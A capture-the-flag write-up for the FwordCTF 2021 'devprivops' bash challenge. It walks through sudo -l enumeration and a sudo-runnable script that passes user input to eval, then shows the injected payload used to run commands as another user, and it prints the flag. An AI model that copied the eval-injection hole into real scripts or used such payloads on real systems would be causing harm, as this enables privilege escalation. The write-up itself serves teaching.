Posts FwordCTF 2021 - devprivops [Bash]
Post
Cancel

FwordCTF 2021 - devprivops [Bash]

Devprivops is a bash challenge from FwordCTF 2021. We are given a ssh access to a machine with just two files in the home directory. The files are called: devops.sh and flag.txt, respectively.

Once logged in the machine we run whoami and verify that we are the user1 user. We can see that there are three user accounts in the system:

1
2
3
4
[email protected]:/home/user1$ cat /etc/passwd | grep "/bin/bash"
root:x:0:0:root:/root:/bin/bash
user1:x:1000:1000::/home/user1/:/bin/bash
user-privileged:x:1001:1001::/home/user-privileged/:/bin/bash

In order to escalate our privileges, we must use some privileged command. We run sudo -l in order to see which privileged commands we are allowed to use:

1
2
3
4
5
6
[email protected]:/home/user1$ sudo -l 
Matching Defaults entries for user1 on 9c82d26746f6:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User user1 may run the following commands on 9c82d26746f6:
    (user-privileged) NOPASSWD: /home/user1/devops.sh

It can be noticed that our user is allowed to run /home/user1/devops.sh as user-privileged without password.

We inspect the devops.sh script in order to identify a vulnerability that will allow us to escalate privileges:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#!/bin/bash
PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:"
exec 2>/dev/null
name="deploy"
while [[ "$1" =~ ^- && ! "$1" == "--" ]]; do case $1 in
  -V | --version )
    echo "Beta version"
    exit
    ;;
  -d | --deploy ) 
     deploy=1
     ;;
  -p | --permission )
     permission=1
     ;;
esac; shift; done
if [[ "$1" == '--' ]]; then shift; fi

echo -ne "Welcome To Devops Swiss Knife \o/\n\nWe deploy everything for you:\n"

if [[ deploy -eq 1 ]];then
        echo -ne "Please enter your true name if you are a shinobi\n"  
        read -r name
        eval "function $name { terraform init &>/dev/null && terraform apply &>/dev/null ; echo \"It should be deployed now\"; }"
        export -f $name
fi

isAdmin=0
# Ofc only admins can deploy stuffs o//
if [[ $isAdmin -eq 1 ]];then
        $name
fi

# Check your current permissions admin-san
if [[ $permission -eq 1 ]];then
        echo "You are: " 
        id
fi

When running /home/user1/devops.sh -p the user remains the same:

1
2
3
4
5
6
[email protected]:/home/user1$ /home/user1/devops.sh -p
Welcome To Devops Swiss Knife \o/

We deploy everything for you:
You are: 
uid=1000(user1) gid=1000(user1) groups=1000(user1)

Keeping in mind that the previous script is runnable as user-privileged:

1
2
3
4
5
6
[email protected]:/home/user1$ sudo -u user-privileged /home/user1/devops.sh -p
Welcome To Devops Swiss Knife \o/

We deploy everything for you:
You are: 
uid=1001(user-privileged) gid=1001(user-privileged) groups=1001(user-privileged)

This means that we can impersonate the user-privileged user from user1 with devops.sh.

We can exploit the script injecting code by running: sudo -u user-privileged /home/user1/devops.sh -d. The deploy argument (-d) of the script reads our input into the $name variable, and places it in an eval statement. Therefore, we can add the following payload: a { echo 1; }; cat flag.txt; function b, as it is shown below:

1
2
3
4
5
6
7
[email protected]:/home/user1$ sudo -u user-privileged /home/user1/devops.sh -d
Welcome To Devops Swiss Knife \o/

We deploy everything for you:
Please enter your true name if you are a shinobi
a { echo 1; }; cat flag.txt; function b
FwordCTF{W00w_KuR0ko_T0ld_M3_th4t_Th1s_1s_M1sdirecti0n_BasK3t_FTW}
This post is licensed under CC BY 4.0 by the author.